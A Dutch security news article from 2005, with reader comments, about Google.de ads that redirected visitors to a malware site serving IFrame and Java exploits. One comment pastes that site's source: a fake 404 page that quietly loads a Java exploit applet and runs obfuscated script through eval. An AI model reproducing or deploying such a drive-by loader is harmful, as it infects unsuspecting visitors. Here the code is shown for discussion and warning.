Google.de advertenties bevatten Trojaans paard
Eind vorig jaar werd een onbekend aantal mensen door een Trojaans paard geinfecteerd doordat de banners van Nu.nl, startpagina.nl en Ilse.nl van de IFRAME exploit code voorzien waren. De problemen met malware en advertenties lijken nog niet voorbij. Afgelopen vrijdag verscheen het bericht dat google.de advertenties toonde met gemanipuleerde URL's. De URL's verwezen computergebruikers naar irg24.com (waarschuwing: niet bezoeken met ongepatchte browser), een website die bezoekers met allerlei malware probeert te infecteren. Een van de pagina's stuurt een IFrameBO (gepatched door MS04-040), een andere pagina stuurt o.a. een Counter.jar met diverse Java exploits. In de loop van vrijdagmiddag verdwenen de foute URL's en leek de zaak opgelost. Dat is echter niet het geval want de advertenties zijn er weer. Zoekt men op termen als "Preisvergleich", "Gebraucht PC", "PCs gunstig online kaufen" en "Urlaub", dan verschijnen de foute advertenties. Het lijkt erop dat de advertenties door middel van gestolen creditcardgegevens op Google.de gefinancierd zijn.
Adblock-plugin,Java uit en Java-script beperkt. Dus ik heb
het eens geprobeerd. Zowel http://irg24.com als
http://www.irg.com geven een 404-fout. Ook via Google.de
zoeken naar "preisvergleich" en "gebraucht pc" levert mij
weinig spannends op: mijn google-pagina's blijven, op de
resultaten na, maagdelijk!
Dezelfde acties geven dezelfde resultaten als ik Internet
Explorer gebruik (via crossover office ;).
Is het feest al voorbij ?
<HTML>
<head>
<script language="JScript">
if (navigator.javaEnabled())
{
document.write("<APPLET ID="applt"
ARCHIVE="Counters.jar" CODE="Counter.class" WIDTH=1
HEIGHT=1>n");
document.write("</APPLET>");
}
</script>
</head>
<title>Error404</title>
<body>
<h1>Error404</h1>
<script>
es="
var ds=new String();
ads=es.split(";");
k=ads.length-1;
for(var j=0;j<k;j++)
{e=ads[j];d=e;ds=ds+String.fromCharCode(d);}eval(ds)
</script>
</body>
</HTML>
Dus het is gewoon wat verborgen..
Lees je de mails van je vrienden ook in "HTML"?
Zoals je zegt "gewoon wat verborgen"...
Naar mijn mening moet e-mail gewoon leesbaar zijn voor iedereen, en dat
jij zo ,vet-cool, bent dat je de trojan hebt ondekt....gaaf man...!!
Je geeft echter geen moer om de opzet en veiligheid van e-mail...(voor
iedereen toegankelijk en veilig). Zolng jij het maar kunt volgen...toch?
Er zijn zat bedrijven die een Trojan proberen te verzenden, maar met zo,n
instelling als jij hebt zullen ze nooit leren de gemeenschap te bereiken.
Maar als ik jouw reactie zo lees geef je meer om je eigen HTML kennis
dan om het bereiken van een (door iedereen te gebruiken) medium als e-
mail.
Vet-coole greetings 2 u man, you are the future...!!!
Bewaar me voor dit soort "know-no's" ;-)
Blij te lezen dat je zo innemend kunt reageren.
Lees je de mails van je vrienden ook in "HTML"?
Zoals je zegt "gewoon wat verborgen"...
Naar mijn mening moet e-mail gewoon leesbaar zijn voor
iedereen, en dat
jij zo ,vet-cool, bent dat je de trojan hebt ondekt....gaaf
man...!!
Je geeft echter geen moer om de opzet en veiligheid van
e-mail...(voor
iedereen toegankelijk en veilig). Zolng jij het maar kunt
volgen...toch?
Er zijn zat bedrijven die een Trojan proberen te verzenden,
maar met zo,n
instelling als jij hebt zullen ze nooit leren de gemeenschap
te bereiken.
Maar als ik jouw reactie zo lees geef je meer om je eigen
HTML kennis
dan om het bereiken van een (door iedereen te gebruiken)
medium als e-
mail.
Vet-coole greetings 2 u man, you are the future...!!!
Bewaar me voor dit soort "know-no's" ;-)
reactie werkelijk te zielig voor woorden.
Je hoeft helemaal geen html-kennis te hebben om deze code te
vinden: als je op de pagina van irg24.com komt, zie je een
404-error staan. In Firefox kan je met View - Page
Source gewoon de code van die pagina bekijken. Daar had
ik zelf, na pas mijn 1e bakkie koffie, niet aan gedacht.
Maar dat geeft niet, het voordeel van zo'n site als dit is
dat je van anderen kunt leren (poster 2, bedankt :).
Kennis komt pas om de hoek kijken als je wilt weten wat de
code doet. Op dit gebied ben ik (ook al) een analfabeet.
Maar ik kan nog wel zien dat er in een lusje iets met een
lange reeks ad's gedaan wordt. Maar ik zie niet wat er zo
speciaal aan is.
Wat we wel opvalt bij het bekijken van deze
(http://www.security.nl/article/9681/1) pagina, is dat
de lay-out een rommeltje wordt, door die hele lange string
in de code van de irg24-pagina. Dat lijkt me een kleine
onvolkomenheid in de site van Security.nl ?!
sjezus wat ben je zelf zielig...
nummer twee geeft alleen maar aan dat het geen echte 404 is.
als je je zo bedreigd voelt door een beetje kennis, is het
wellicht verstandig een keer een boek te gaan lezen.
thijzzz
"Door Anoniem op dinsdag 04 januari 2005 01:32" :
sjezus wat ben je zelf zielig...
nummer twee geeft alleen maar aan dat het geen echte 404 is.
als je je zo bedreigd voelt door een beetje kennis, is het
wellicht verstandig een keer een boek te gaan lezen.
thijzzz
is het wel wat jammer idd. ;-)
Overigens wordt deze pagina nu wel goed weergegeven...
Blij te lezen dat je zo innemend kunt reageren.
Lees je de mails van je vrienden ook in "HTML"?
....Nog wat gelul.....)
Man, doe niet zo gefrustreerd... geen vrienden ofzo? Ik geef
alleen maar aan dat het geen echte 404 is, wat anderen ook
al zeiden.
aangeraden om het IP-adres van dit domein te blokkeren in de
Firewall. Blokkeer IP: 65.75.191.106
Deze posting is gelocked. Reageren is niet meer mogelijk.
Junior DevOps Engineer
Certified Secure is op zoek naar een Junior DevOps Engineer. Deze functie is een stuk interessanter dan de term doet vermoeden! Om jou als potentiële nieuwe collega meteen te laten zien wat we doen hebben we speciaal voor jou een selectie gemaakt van een aantal leuke security challenges. Are you ready for a challenge?
Cybersecurity Trainer / Streamer
Toe aan een nieuwe nieuwe job waarmee je het verschil maakt? In de Certified Secure trainingen laat je deelnemers zien hoe actuele kwetsbaarheden structureel verholpen worden. Ook werk je actief mee aan de ontwikkeling van onze gamified security challenges. Bij het maken van challenges kom je telkens nieuwe technieken tegen, van Flutter tot GraphQL, van Elastic Search tot Kubernetes.
